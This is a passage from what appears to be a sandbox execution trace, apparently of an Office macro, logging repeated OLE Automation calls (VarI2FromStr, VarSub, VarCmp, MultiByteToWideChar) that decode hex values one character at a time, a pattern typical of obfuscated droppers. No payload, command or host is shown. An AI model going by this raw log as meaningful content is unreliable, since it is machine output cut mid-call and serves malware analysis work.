lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="G") returned 1 [0175.163] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.163] GetUserDefaultLCID () returned 0x409 [0175.163] malloc (_Size=0xa0) returned 0x11f50080 [0175.164] free (_Block=0x11f50080) [0175.164] GetUserDefaultLCID () returned 0x409 [0175.164] VarI2FromStr (in: strIn="&H94", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.164] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0175.164] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.164] GetUserDefaultLCID () returned 0x409 [0175.164] malloc (_Size=0xa0) returned 0x11f50080 [0175.164] free (_Block=0x11f50080) [0175.164] GetUserDefaultLCID () returned 0x409 [0175.165] VarI2FromStr (in: strIn="&Hc7", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.165] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="y") returned 1 [0175.165] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0175.165] GetUserDefaultLCID () returned 0x409 [0175.165] malloc (_Size=0xa0) returned 0x11f50080 [0175.165] free (_Block=0x11f50080) [0175.165] GetUserDefaultLCID () returned 0x409 [0175.165] VarI2FromStr (in: strIn="&Hc0", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.165] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0175.165] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.165] GetUserDefaultLCID () returned 0x409 [0175.166] malloc (_Size=0xa0) returned 0x11f50080 [0175.166] free (_Block=0x11f50080) [0175.166] GetUserDefaultLCID () returned 0x409 [0175.166] VarI2FromStr (in: strIn="&Hbe", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.166] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="P") returned 1 [0175.166] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.166] GetUserDefaultLCID () returned 0x409 [0175.166] malloc (_Size=0xa0) returned 0x11f50080 [0175.166] free (_Block=0x11f50080) [0175.166] GetUserDefaultLCID () returned 0x409 [0175.166] VarI2FromStr (in: strIn="&Hac", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.167] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0175.167] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.167] GetUserDefaultLCID () returned 0x409 [0175.167] malloc (_Size=0xa0) returned 0x11f50080 [0175.167] free (_Block=0x11f50080) [0175.167] GetUserDefaultLCID () returned 0x409 [0175.167] VarI2FromStr (in: strIn="&Hd6", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.167] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="q") returned 1 [0175.167] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.167] GetUserDefaultLCID () returned 0x409 [0175.167] malloc (_Size=0xa0) returned 0x11f50080 [0175.168] free (_Block=0x11f50080) [0175.168] GetUserDefaultLCID () returned 0x409 [0175.168] VarI2FromStr (in: strIn="&H8e", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.168] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="8") returned 1 [0175.168] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.168] GetUserDefaultLCID () returned 0x409 [0175.168] malloc (_Size=0xa0) returned 0x11f50080 [0175.168] free (_Block=0x11f50080) [0175.169] GetUserDefaultLCID () returned 0x409 [0175.169] VarI2FromStr (in: strIn="&Ha8", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.169] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="5") returned 1 [0175.169] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.169] GetUserDefaultLCID () returned 0x409 [0175.169] malloc (_Size=0xa0) returned 0x11f50080 [0175.169] free (_Block=0x11f50080) [0175.169] GetUserDefaultLCID () returned 0x409 [0175.169] VarI2FromStr (in: strIn="&Hdc", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.169] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0175.169] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.170] GetUserDefaultLCID () returned 0x409 [0175.170] malloc (_Size=0xa0) returned 0x11f50080 [0175.170] free (_Block=0x11f50080) [0175.170] GetUserDefaultLCID () returned 0x409 [0175.170] VarI2FromStr (in: strIn="&Ha4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.170] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="U") returned 1 [0175.170] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.170] GetUserDefaultLCID () returned 0x409 [0175.170] malloc (_Size=0xa0) returned 0x11f50080 [0175.170] free (_Block=0x11f50080) [0175.171] GetUserDefaultLCID () returned 0x409 [0175.171] VarI2FromStr (in: strIn="&Hd2", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.171] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="b") returned 1 [0175.171] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.171] GetUserDefaultLCID () returned 0x409 [0175.171] malloc (_Size=0xa0) returned 0x11f50080 [0175.171] free (_Block=0x11f50080) [0175.171] GetUserDefaultLCID () returned 0x409 [0175.171] VarI2FromStr (in: strIn="&He3", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.171] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0175.172] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.172] malloc (_Size=0xa0) returned 0x11f50080 [0175.172] free (_Block=0x11f50080) [0175.172] VarI2FromStr (in: strIn="&Hae", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.172] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0175.172] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.172] malloc (_Size=0xa0) returned 0x11f50080 [0175.172] free (_Block=0x11f50080) [0175.172] VarI2FromStr (in: strIn="&Hbf", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.172] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="q") returned 1 [0175.173] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0175.173] malloc (_Size=0xa0) returned 0x11f50080 [0175.173] free (_Block=0x11f50080) [0175.173] VarI2FromStr (in: strIn="&Haa", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.173] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="9") returned 1 [0175.173] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.173] malloc (_Size=0xa0) returned 0x11f50080 [0175.173] free (_Block=0x11f50080) [0175.173] VarI2FromStr (in: strIn="&Hb5", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.173] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="G") returned 1 [0175.173] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.174] malloc (_Size=0xa0) returned 0x11f50080 [0175.174] free (_Block=0x11f50080) [0175.174] VarI2FromStr (in: strIn="&Hcc", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.174] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0175.174] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.174] malloc (_Size=0xa0) returned 0x11f50080 [0175.174] free (_Block=0x11f50080) [0175.174] VarI2FromStr (in: strIn="&Hdf", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.174] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="z") returned 1 [0175.174] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.174] malloc (_Size=0xa0) returned 0x11f50080 [0175.175] free (_Block=0x11f50080) [0175.175] VarI2FromStr (in: strIn="&Hb0", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.175] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="Z") returned 1 [0175.175] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.175] malloc (_Size=0xa0) returned 0x11f50080 [0175.175] free (_Block=0x11f50080) [0175.175] VarI2FromStr (in: strIn="&Ha9", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.175] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="6") returned 1 [0175.175] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.175] malloc (_Size=0xa0) returned 0x11f50080 [0175.176] free (_Block=0x11f50080) [0175.176] VarI2FromStr (in: strIn="&Hdb", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.176] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0175.176] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.176] malloc (_Size=0xa0) returned 0x11f50080 [0175.176] free (_Block=0x11f50080) [0175.176] VarI2FromStr (in: strIn="&Hc1", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.176] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0175.176] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.176] malloc (_Size=0xa0) returned 0x11f50080 [0175.176] free (_Block=0x11f50080) [0175.177] VarI2FromStr (in: strIn="&Ha8", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.177] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="8") returned 1 [0175.177] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.177] malloc (_Size=0xa0) returned 0x11f50080 [0175.177] free (_Block=0x11f50080) [0175.177] VarI2FromStr (in: strIn="&Hd4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.177] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0175.177] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.177] malloc (_Size=0xa0) returned 0x11f50080 [0175.177] free (_Block=0x11f50080) [0175.177] VarI2FromStr (in: strIn="&Hbd", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.178] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="X") returned 1 [0175.178] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.178] malloc (_Size=0xa0) returned 0x11f50080 [0175.178] free (_Block=0x11f50080) [0175.178] VarI2FromStr (in: strIn="&H7e", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.178] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0175.178] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0175.178] malloc (_Size=0xa0) returned 0x11f50080 [0175.178] free (_Block=0x11f50080) [0175.178] VarI2FromStr (in: strIn="&Hd2", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, 